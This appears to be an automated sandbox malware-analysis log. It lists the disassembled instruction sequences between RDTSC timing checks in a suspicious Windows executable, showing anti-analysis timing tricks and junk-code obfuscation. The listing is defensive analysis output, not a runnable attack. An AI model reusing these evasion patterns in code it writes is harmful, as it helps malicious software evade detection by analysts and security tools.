                Source: C:\Users\user\Desktop\FBmz85HS0d.exe | RDTSC instruction interceptor: First address: 4A12FD second address: 4A131A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 pop edi 0x00000008 push eax 0x00000009 push esi 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F4EF0C09E21h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exe | RDTSC instruction interceptor: First address: 4A2C22 second address: 4A2C28 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exe | RDTSC instruction interceptor: First address: 4A792A second address: 4A7975 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F4EF0C09E29h 0x00000008 jbe 00007F4EF0C09E16h 0x0000000e popad 0x0000000f push esi 0x00000010 push edi 0x00000011 pop edi 0x00000012 pop esi 0x00000013 pop edx 0x00000014 pop eax 0x00000015 pushad 0x00000016 jp 00007F4EF0C09E2Eh 0x0000001c push ebx 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exe | RDTSC instruction interceptor: First address: 4A7975 second address: 4A7986 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 push edx 0x0000000a pop edx 0x0000000b jnl 00007F4EF0C79886h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exe | RDTSC instruction interceptor: First address: 4A7ABA second address: 4A7AC0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exe | RDTSC instruction interceptor: First address: 4A7AC0 second address: 4A7AC4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exe | RDTSC instruction interceptor: First address: 4A7AC4 second address: 4A7AC8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exe | RDTSC instruction interceptor: First address: 4A7AC8 second address: 4A7AD9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F4EF0C79886h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exe | RDTSC instruction interceptor: First address: 4A7AD9 second address: 4A7AE1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exe | RDTSC instruction interceptor: First address: 4A7AE1 second address: 4A7AE6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exe | RDTSC instruction interceptor: First address: 4A7D2D second address: 4A7D31 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exe | RDTSC instruction interceptor: First address: 4A7D31 second address: 4A7D8D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 jmp 00007F4EF0C79895h 0x0000000c pop edx 0x0000000d pushad 0x0000000e jo 00007F4EF0C79886h 0x00000014 push ebx 0x00000015 pop ebx 0x00000016 jc 00007F4EF0C79886h 0x0000001c popad 0x0000001d push ebx 0x0000001e jmp 00007F4EF0C79890h 0x00000023 jmp 00007F4EF0C79893h 0x00000028 pop ebx 0x00000029 popad 0x0000002a pushad 0x0000002b push eax 0x0000002c push edx 0x0000002d jno 00007F4EF0C79886h 0x00000033 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exe | RDTSC instruction interceptor: First address: 4A7D8D second address: 4A7DA4 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F4EF0C09E16h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jmp 00007F4EF0C09E1Ah 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exe | RDTSC instruction interceptor: First address: 4A7DA4 second address: 4A7DC2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jmp 00007F4EF0C79893h 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exe | RDTSC instruction interceptor: First address: 4A7DC2 second address: 4A7DD7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4EF0C09E21h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exe | RDTSC instruction interceptor: First address: 4A7DD7 second address: 4A7DDD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exe | RDTSC instruction interceptor: First address: 4A7EFB second address: 4A7F01 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exe | RDTSC instruction interceptor: First address: 4A7F01 second address: 4A7F06 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exe | RDTSC instruction interceptor: First address: 4AA845 second address: 4AA84A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exe | RDTSC instruction interceptor: First address: 4AA9AA second address: 4AA9AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exe | RDTSC instruction interceptor: First address: 4AAB86 second address: 4AAB8C instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exe | RDTSC instruction interceptor: First address: 4AAB8C second address: 4AABA0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F4EF0C79890h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exe | RDTSC instruction interceptor: First address: 4AAE80 second address: 4AAE86 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exe | RDTSC instruction interceptor: First address: 4AAE86 second address: 4AAE90 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F4EF0C7988Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exe | RDTSC instruction interceptor: First address: 4AB638 second address: 4AB63D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exe | RDTSC instruction interceptor: First address: 4AB87A second address: 4AB897 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jmp 00007F4EF0C79891h 0x00000008 pop edx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exe | RDTSC instruction interceptor: First address: 4AC927 second address: 4AC92D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exe | RDTSC instruction interceptor: First address: 4AC92D second address: 4AC9A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop eax 0x00000006 nop 0x00000007 jmp 00007F4EF0C79895h 0x0000000c push 00000000h 0x0000000e push 00000000h 0x00000010 push ebp 0x00000011 call 00007F4EF0C79888h 0x00000016 pop ebp 0x00000017 mov dword ptr [esp+04h], ebp 0x0000001b add dword ptr [esp+04h], 00000017h 0x00000023 inc ebp 0x00000024 push ebp 0x00000025 ret 0x00000026 pop ebp 0x00000027 ret 0x00000028 mov esi, ebx 0x0000002a push 00000000h 0x0000002c push 00000000h 0x0000002e push ebp 0x0000002f call 00007F4EF0C79888h 0x00000034 pop ebp 0x00000035 mov dword ptr [esp+04h], ebp 0x00000039 add dword ptr [esp+04h], 00000018h 0x00000041 inc ebp 0x00000042 push ebp 0x00000043 ret 0x00000044 pop ebp 0x00000045 ret 0x00000046 mov edi, dword ptr [ebp+122D1D9Bh] 0x0000004c xchg eax, ebx 0x0000004d push eax 0x0000004e push edx 0x0000004f jo 00007F4EF0C7988Ch 0x00000055 jo 00007F4EF0C79886h 0x0000005b rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 4AC9A3 second address: 4AC9A8 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 4AC9A8 second address: 4AC9B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b je 00007F4EF0C79886h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 4AEC44 second address: 4AEC56 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4EF0C09E1Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 4AEC56 second address: 4AEC5C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 4AF9A5 second address: 4AF9C1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F4EF0C09E28h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 4B066A second address: 4B0674 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F4EF0C79886h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 4B3A32 second address: 4B3A55 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 push eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F4EF0C09E28h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 4B0E7F second address: 4B0E84 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 4B1954 second address: 4B1962 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 4B1962 second address: 4B1974 instructions: 0x00000000 rdtsc 0x00000002 je 00007F4EF0C79886h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jg 00007F4EF0C79886h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 4B4C86 second address: 4B4C91 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F4EF0C09E16h 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 4B4C91 second address: 4B4C96 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 4B78E0 second address: 4B78E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 4B5BDD second address: 4B5BE1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 4B78E4 second address: 4B797D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4EF0C09E27h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F4EF0C09E1Fh 0x0000000f nop 0x00000010 push 00000000h 0x00000012 push ebx 0x00000013 call 00007F4EF0C09E18h 0x00000018 pop ebx 0x00000019 mov dword ptr [esp+04h], ebx 0x0000001d add dword ptr [esp+04h], 00000017h 0x00000025 inc ebx 0x00000026 push ebx 0x00000027 ret 0x00000028 pop ebx 0x00000029 ret 0x0000002a mov edi, dword ptr [ebp+124770FAh] 0x00000030 push 00000000h 0x00000032 push 00000000h 0x00000034 push ebp 0x00000035 call 00007F4EF0C09E18h 0x0000003a pop ebp 0x0000003b mov dword ptr [esp+04h], ebp 0x0000003f add dword ptr [esp+04h], 0000001Dh 0x00000047 inc ebp 0x00000048 push ebp 0x00000049 ret 0x0000004a pop ebp 0x0000004b ret 0x0000004c push 00000000h 0x0000004e sub dword ptr [ebp+122D2B26h], eax 0x00000054 xchg eax, esi 0x00000055 jmp 00007F4EF0C09E22h 0x0000005a push eax 0x0000005b push esi 0x0000005c push eax 0x0000005d push edx 0x0000005e pushad 0x0000005f popad 0x00000060 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 4B5BE1 second address: 4B5BEB instructions: 0x00000000 rdtsc 0x00000002 jp 00007F4EF0C79886h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 4B893A second address: 4B894A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop eax 0x00000006 push eax 0x00000007 js 00007F4EF0C09E1Eh 0x0000000d push ebx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 4B7AB5 second address: 4B7AB9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 4B894A second address: 4B8990 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 nop 0x00000006 adc bl, FFFFFFBDh 0x00000009 push 00000000h 0x0000000b sbb bl, 00000000h 0x0000000e jnl 00007F4EF0C09E16h 0x00000014 push 00000000h 0x00000016 push 00000000h 0x00000018 push esi 0x00000019 call 00007F4EF0C09E18h 0x0000001e pop esi 0x0000001f mov dword ptr [esp+04h], esi 0x00000023 add dword ptr [esp+04h], 00000019h 0x0000002b inc esi 0x0000002c push esi 0x0000002d ret 0x0000002e pop esi 0x0000002f ret 0x00000030 push edi 0x00000031 pop ebx 0x00000032 push eax 0x00000033 pushad 0x00000034 jno 00007F4EF0C09E18h 0x0000003a push ebx 0x0000003b push eax 0x0000003c push edx 0x0000003d rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 4B7B52 second address: 4B7B56 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 4B7B56 second address: 4B7B65 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4EF0C09E1Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 4B8B44 second address: 4B8B4A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 4BA839 second address: 4BA840 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 4BA840 second address: 4BA845 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 4BA845 second address: 4BA84B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 4BC747 second address: 4BC74B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 4BC74B second address: 4BC751 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 4BC751 second address: 4BC778 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jmp 00007F4EF0C79894h 0x00000008 pop ecx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d je 00007F4EF0C79888h 0x00000013 push eax 0x00000014 pop eax 0x00000015 pushad 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 4BD69D second address: 4BD6A3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 4BD746 second address: 4BD74A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 4BD74A second address: 4BD750 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 4BD750 second address: 4BD756 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 4BAA59 second address: 4BAA5D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 4BC9C9 second address: 4BC9CD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 4BFE2E second address: 4BFE34 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 4BD87A second address: 4BD87E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 4BD87E second address: 4BD92F instructions: 0x00000000 rdtsc 0x00000002 jp 00007F4EF0C09E16h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c jmp 00007F4EF0C09E1Eh 0x00000011 nop 0x00000012 push 00000000h 0x00000014 push edx 0x00000015 call 00007F4EF0C09E18h 0x0000001a pop edx 0x0000001b mov dword ptr [esp+04h], edx 0x0000001f add dword ptr [esp+04h], 00000015h 0x00000027 inc edx 0x00000028 push edx 0x00000029 ret 0x0000002a pop edx 0x0000002b ret 0x0000002c jmp 00007F4EF0C09E1Ah 0x00000031 push dword ptr fs:[00000000h] 0x00000038 push 00000000h 0x0000003a push ebp 0x0000003b call 00007F4EF0C09E18h 0x00000040 pop ebp 0x00000041 mov dword ptr [esp+04h], ebp 0x00000045 add dword ptr [esp+04h], 0000001Ch 0x0000004d inc ebp 0x0000004e push ebp 0x0000004f ret 0x00000050 pop ebp 0x00000051 ret 0x00000052 and edi, 48BDCCD4h 0x00000058 mov dword ptr fs:[00000000h], esp 0x0000005f xor ebx, 5BBA1D90h 0x00000065 mov eax, dword ptr [ebp+122D14A9h] 0x0000006b mov bx, E713h 0x0000006f push FFFFFFFFh 0x00000071 nop 0x00000072 je 00007F4EF0C09E2Fh 0x00000078 jmp 00007F4EF0C09E29h 0x0000007d push eax 0x0000007e push eax 0x0000007f push edi 0x00000080 push eax 0x00000081 push edx 0x00000082 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 4C0FD6 second address: 4C0FDA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 4C0FDA second address: 4C0FFD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4EF0C09E20h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ecx 0x0000000a jc 00007F4EF0C09E16h 0x00000010 pop ecx 0x00000011 popad 0x00000012 push eax 0x00000013 push ebx 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 popad 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 4C0FFD second address: 4C1073 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 nop 0x00000008 push 00000000h 0x0000000a push ebx 0x0000000b call 00007F4EF0C79888h 0x00000010 pop ebx 0x00000011 mov dword ptr [esp+04h], ebx 0x00000015 add dword ptr [esp+04h], 00000017h 0x0000001d inc ebx 0x0000001e push ebx 0x0000001f ret 0x00000020 pop ebx 0x00000021 ret 0x00000022 mov bx, 2F00h 0x00000026 mov dword ptr [ebp+122D2A53h], esi 0x0000002c push 00000000h 0x0000002e mov ebx, 4F7099E1h 0x00000033 push 00000000h 0x00000035 push 00000000h 0x00000037 push edi 0x00000038 call 00007F4EF0C79888h 0x0000003d pop edi 0x0000003e mov dword ptr [esp+04h], edi 0x00000042 add dword ptr [esp+04h], 00000016h 0x0000004a inc edi 0x0000004b push edi 0x0000004c ret 0x0000004d pop edi 0x0000004e ret 0x0000004f push eax 0x00000050 pushad 0x00000051 push esi 0x00000052 jmp 00007F4EF0C79896h 0x00000057 pop esi 0x00000058 push eax 0x00000059 push edx 0x0000005a push eax 0x0000005b pop eax 0x0000005c rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 4C11AD second address: 4C1270 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4EF0C09E27h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jp 00007F4EF0C09E2Eh 0x00000010 nop 0x00000011 push 00000000h 0x00000013 push edi 0x00000014 call 00007F4EF0C09E18h 0x00000019 pop edi 0x0000001a mov dword ptr [esp+04h], edi 0x0000001e add dword ptr [esp+04h], 00000015h 0x00000026 inc edi 0x00000027 push edi 0x00000028 ret 0x00000029 pop edi 0x0000002a ret 0x0000002b mov ebx, dword ptr [ebp+122D2E35h] 0x00000031 push dword ptr fs:[00000000h] 0x00000038 mov bx, E6BCh 0x0000003c mov dword ptr fs:[00000000h], esp 0x00000043 mov eax, dword ptr [ebp+122D0261h] 0x00000049 jmp 00007F4EF0C09E23h 0x0000004e push FFFFFFFFh 0x00000050 push 00000000h 0x00000052 push eax 0x00000053 call 00007F4EF0C09E18h 0x00000058 pop eax 0x00000059 mov dword ptr [esp+04h], eax 0x0000005d add dword ptr [esp+04h], 00000018h 0x00000065 inc eax 0x00000066 push eax 0x00000067 ret 0x00000068 pop eax 0x00000069 ret 0x0000006a mov dword ptr [ebp+12477525h], ecx 0x00000070 jmp 00007F4EF0C09E1Ch 0x00000075 push eax 0x00000076 push eax 0x00000077 push edx 0x00000078 pushad 0x00000079 push eax 0x0000007a push edx 0x0000007b rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 4C1270 second address: 4C1277 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 4C45FA second address: 4C4600 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 4C4600 second address: 4C466B instructions: 0x00000000 rdtsc 0x00000002 ja 00007F4EF0C79888h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d push 00000000h 0x0000000f push esi 0x00000010 call 00007F4EF0C79888h 0x00000015 pop esi 0x00000016 mov dword ptr [esp+04h], esi 0x0000001a add dword ptr [esp+04h], 00000014h 0x00000022 inc esi 0x00000023 push esi 0x00000024 ret 0x00000025 pop esi 0x00000026 ret 0x00000027 xor di, 16D3h 0x0000002c push 00000000h 0x0000002e push 00000000h 0x00000030 push eax 0x00000031 call 00007F4EF0C79888h 0x00000036 pop eax 0x00000037 mov dword ptr [esp+04h], eax 0x0000003b add dword ptr [esp+04h], 00000018h 0x00000043 inc eax 0x00000044 push eax 0x00000045 ret 0x00000046 pop eax 0x00000047 ret 0x00000048 pushad 0x00000049 mov edx, dword ptr [ebp+122D2D17h] 0x0000004f and al, FFFFFFE3h 0x00000052 popad 0x00000053 push 00000000h 0x00000055 mov di, ax 0x00000058 movzx ebx, cx 0x0000005b xchg eax, esi 0x0000005c push eax 0x0000005d push edx 0x0000005e push ebx 0x0000005f push eax 0x00000060 push edx 0x00000061 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 4C38AF second address: 4C38B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 4C466B second address: 4C4670 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 4C4670 second address: 4C4677 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 4C4804 second address: 4C4809 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
